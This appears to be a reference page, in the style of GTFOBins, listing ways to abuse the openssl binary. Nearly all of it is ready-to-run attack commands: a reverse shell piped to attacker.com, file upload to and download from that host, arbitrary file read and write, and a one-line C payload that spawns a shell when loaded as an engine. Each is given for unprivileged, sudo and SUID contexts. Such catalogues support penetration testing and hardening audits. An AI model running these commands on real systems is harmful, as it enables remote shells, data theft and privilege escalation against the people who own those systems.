.. / openssl

Sponsor Fork Star

• Reverse shell
• File write
• File read
• Upload
• Download
• Library load

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

• Comment

  The shell process is not spawn by openssl.

  Unprivileged

  This function can be performed by any unprivileged user.

  mkfifo /path/to/temp-socket
  /bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  mkfifo /path/to/temp-socket
  /bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  mkfifo /path/to/temp-socket
  /bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket

  TTY

  The spawned shell is just a dummy REPL that can only run simple terminal commands.

  Listener

  A TLS server can be used on the attacker box to receive the shell.

  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

File write

This executable can write data to local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  echo DATA | openssl enc -out /path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo DATA | openssl enc -out /path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  echo DATA | openssl enc -out /path/to/output-file

• Unprivileged

  This function can be performed by any unprivileged user.

  openssl enc -in /path/to/input-file -out /path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  openssl enc -in /path/to/input-file -out /path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  openssl enc -in /path/to/input-file -out /path/to/output-file

File read

This executable can read data from local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  openssl enc -in /path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  openssl enc -in /path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  openssl enc -in /path/to/input-file

Upload

This executable can upload local data.

• Unprivileged

  This function can be performed by any unprivileged user.

  openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file

  Receiver

  A TLS server can be used on the attacker box to receive the data.

  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 >/path/to/output-file

Download

This executable can download remote data.

• Unprivileged

  This function can be performed by any unprivileged user.

  openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file

  Sender

  A TLS server can be used on the attacker box to send the data.

  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 </path/to/input-file

Library load

This executable can load shared libraries that may be used to run arbitrary code in the same execution context.

• Unprivileged

  This function can be performed by any unprivileged user.

  openssl req -engine ./lib.so

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  openssl req -engine ./lib.so

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  openssl req -engine ./lib.so

  Payload

  As an example, the following can be used to create a minimal shared library (lib.so) that spawns a shell upon loading:

  echo '__attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); }' \
      | gcc -w -fPIC -shared -o lib.so -x c -
  

  Add the usual -p argument to the shell for SUID contexts. Consider calling setuid(0); beforehand if the executable has the CAP_SETUID capability assigned.

Source | History